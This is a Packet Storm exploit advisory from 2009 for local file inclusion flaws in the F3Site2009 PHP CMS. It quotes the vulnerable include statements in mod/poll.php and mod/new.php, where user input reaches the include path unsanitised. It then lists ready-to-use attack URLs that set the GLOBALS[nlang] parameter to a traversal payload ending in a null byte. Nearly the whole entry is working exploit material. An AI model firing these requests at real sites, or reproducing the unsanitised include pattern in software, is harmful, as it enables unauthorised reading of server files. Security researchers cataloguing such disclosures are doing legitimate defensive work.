F3Site2009 Local File Inclusion

2009-12-18T00:00:00
ID PACKETSTORM:84066
Type packetstorm
Reporter cr4wl3r
Modified 2009-12-18T00:00:00

Description

                                        
                                            `##################################################################  
## Exploit Title: F3Site2009 Multiple LFI Exploit ##  
## Date: 18-12-2009 ##  
## Author: cr4wl3r ##  
## Software Link: http://code.google.com/p/f3site/ ##  
## Version: N/A ##  
## Tested on: GNU/LINUX ##  
##################################################################  
  
~ Code [poll.php] :  
  
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):  
include('./cache/poll_'.$GLOBALS['nlang'].'.php');  
  
~ 3xplo!t :  
  
[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]  
  
  
~ Code [new.php] :  
  
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))  
{  
include './cache/new-'.$GLOBALS['nlang'].'.php';  
}  
  
~ 3xplo!t :  
  
[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]  
  
`